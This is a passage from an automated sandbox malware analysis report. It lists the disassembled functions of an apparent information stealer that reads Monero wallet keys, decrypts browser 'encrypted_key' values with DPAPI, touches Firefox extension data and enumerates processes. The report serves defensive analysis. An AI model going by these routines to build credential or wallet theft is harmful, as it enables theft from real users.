                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: a0a9ea63f3aa0dc60cc1cbec6669e7d03fd1605e1934a097dec42700debebc01
                            • Instruction ID: e5e054d027b8cc5a4822bbbd9da4983cee8c4a5d289f3d8ee53e6547ddb46a4e
                            • Opcode Fuzzy Hash: a0a9ea63f3aa0dc60cc1cbec6669e7d03fd1605e1934a097dec42700debebc01
                            • Instruction Fuzzy Hash: 9BE1EF728205189BDF06FBA4DC92EEE7738BF14300F508259F5167A091EF306A4DDBA6
                            Function 0038D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038D481
                            • lstrlen.KERNEL32(00000000), ref: 0038D698
                            • lstrlen.KERNEL32(00000000), ref: 0038D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0038D72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 3f9a3f4d45ceadd76c4e743b67ae6fe2b330e65b5b92fde0eafdbb092197317e
                            • Instruction ID: 922582bf5d6269c9307a87f0b82a4a81ca8ac03e21c9380f9b7b24045c087f1e
                            • Opcode Fuzzy Hash: 3f9a3f4d45ceadd76c4e743b67ae6fe2b330e65b5b92fde0eafdbb092197317e
                            • Instruction Fuzzy Hash: F3910E728105189BDF06FBA4DC96EEE7778AF14304F504268F507BA091EF346A49DBE2
                            Function 0038D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038D801
                            • lstrlen.KERNEL32(00000000), ref: 0038D99F
                            • lstrlen.KERNEL32(00000000), ref: 0038D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0038DA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: af625d85f526364e9ef7779c8c918b222552ef01c9bec8a9de5df7a1153864d8
                            • Instruction ID: f3d36959b2809c2997caa072579169486ec5b1cd1aceca1a82d0fa4bb5b3b5b0
                            • Opcode Fuzzy Hash: af625d85f526364e9ef7779c8c918b222552ef01c9bec8a9de5df7a1153864d8
                            • Instruction Fuzzy Hash: EA8111729205189BDF06FBA4DC96DEE7778BF14300F504268F507AA091EF346A09DBE2
                            Function 0038F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003A1580,003A0D92), ref: 0038F54C
                            • lstrlen.KERNEL32(00000000), ref: 0038F56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 33e005fff9cfb95157f22af441b41ffb73d1142856b4cb795a119b0d3425c198
                            • Instruction ID: 3719ad843e5e3d7a7fc1604642f2b2dc8c043dfdf228baf735376802ea49d2f4
                            • Opcode Fuzzy Hash: 33e005fff9cfb95157f22af441b41ffb73d1142856b4cb795a119b0d3425c198
                            • Instruction Fuzzy Hash: 4751F171D106089ADF05FBE4DC96DED7778AF54300F408628F816AB191EF346A09DBE2
                            Function 003970D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                            Download Yara Rule
                            Strings
                            • s9, xrefs: 003972AE, 00397179, 0039717C
                            • s9, xrefs: 00397111
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0039718C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: s9$s9$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 3722407311-539146638
                            • Opcode ID: dd82771ad797f90fe12b83881624d8f7a3538e85641617288abd253d02af95ce
                            • Instruction ID: 4c6fab5d56e97c335a0409147090bed9edfb0e38f856cd5f31bdf4ac78ab18a0
                            • Opcode Fuzzy Hash: dd82771ad797f90fe12b83881624d8f7a3538e85641617288abd253d02af95ce
                            • Instruction Fuzzy Hash: D7517FB1C142189BDF25EBA0DC82BEEB774AF44304F2445A8E1157A1C1EB746E88CF59
                            Function 00393560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 09a83b4b0b8d629d66388e322089814c1e8b9fd117247291840106e4d1d0d9c6
                            • Instruction ID: be9e13ba020817e8028eda20d1670d53116c715e20f4c03c9b2f793aebe88e21
                            • Opcode Fuzzy Hash: 09a83b4b0b8d629d66388e322089814c1e8b9fd117247291840106e4d1d0d9c6
                            • Instruction Fuzzy Hash: 63411FB1D10109AFDF05EFE4D885AFEB778EB54304F008518E5167B251DB75AA05CFA2
                            Function 00389CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00389D39
                              • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                              • Part of subcall function 00389AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                              • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                              • Part of subcall function 00389AC0: LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                              • Part of subcall function 00389B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00389B84
                              • Part of subcall function 00389B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00389BA3
                              • Part of subcall function 00389B60: LocalFree.KERNEL32(?), ref: 00389BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 831447147f16de682c1285c83c7769f8f28b575195cb9bc6471932c01a664bd1
                            • Instruction ID: aae334c1e298ad60e90db5df7fa8f0a175059b69aea0b97d015a34224787b20c
                            • Opcode Fuzzy Hash: 831447147f16de682c1285c83c7769f8f28b575195cb9bc6471932c01a664bd1
                            • Instruction Fuzzy Hash: 473110B5D10209ABCF05EBE4DC85BFEB7B8AB48304F184559E905A7241E7359A04CBA5
                            Function 00398680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003A05B7), ref: 003986CA
                            • Process32First.KERNEL32(?,00000128), ref: 003986DE
                            • Process32Next.KERNEL32(?,00000128), ref: 003986F3
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • CloseHandle.KERNEL32(?), ref: 00398761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 99ada2e8db796f69c79db08df99908351a5f367c5d0c35e0cc7e251a8e443978
                            • Instruction ID: e200a4546d09bac8755ca038740d6f7c8204980b92bf94e79bce064a7257520b
                            • Opcode Fuzzy Hash: 99ada2e8db796f69c79db08df99908351a5f367c5d0c35e0cc7e251a8e443978
                            • Instruction Fuzzy Hash: CF316B71911618ABCF26DF90DC45FEEBBB8FF45700F104299E10AA61A0DB306A45CFA1
                            Function 00397980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003A0E00,00000000,?), ref: 003979B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003979B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,003A0E00,00000000,?), ref: 003979C4
                            • wsprintfA.USER32 ref: 003979F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: b7f386924b5cdf823cbff37be307c9b1c8664ff29223caa0f8c9ebbea3b855a6
                            • Instruction ID: 65e07c739a43ce62a096029178ec7b1534f3d1f637dbffe8b0be45d2fe566de1
                            • Opcode Fuzzy Hash: b7f386924b5cdf823cbff37be307c9b1c8664ff29223caa0f8c9ebbea3b855a6
                            • Instruction Fuzzy Hash: FA1123B2904518ABCB14DFCADD45FBEBBF8FB4CB15F10421AF605A2280E2395944DBB1
                            Function 0039C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 0039C74E
                              • Part of subcall function 0039BF9F: __amsg_exit.LIBCMT ref: 0039BFAF
                            • __getptd.LIBCMT ref: 0039C765
                            • __amsg_exit.LIBCMT ref: 0039C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0039C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
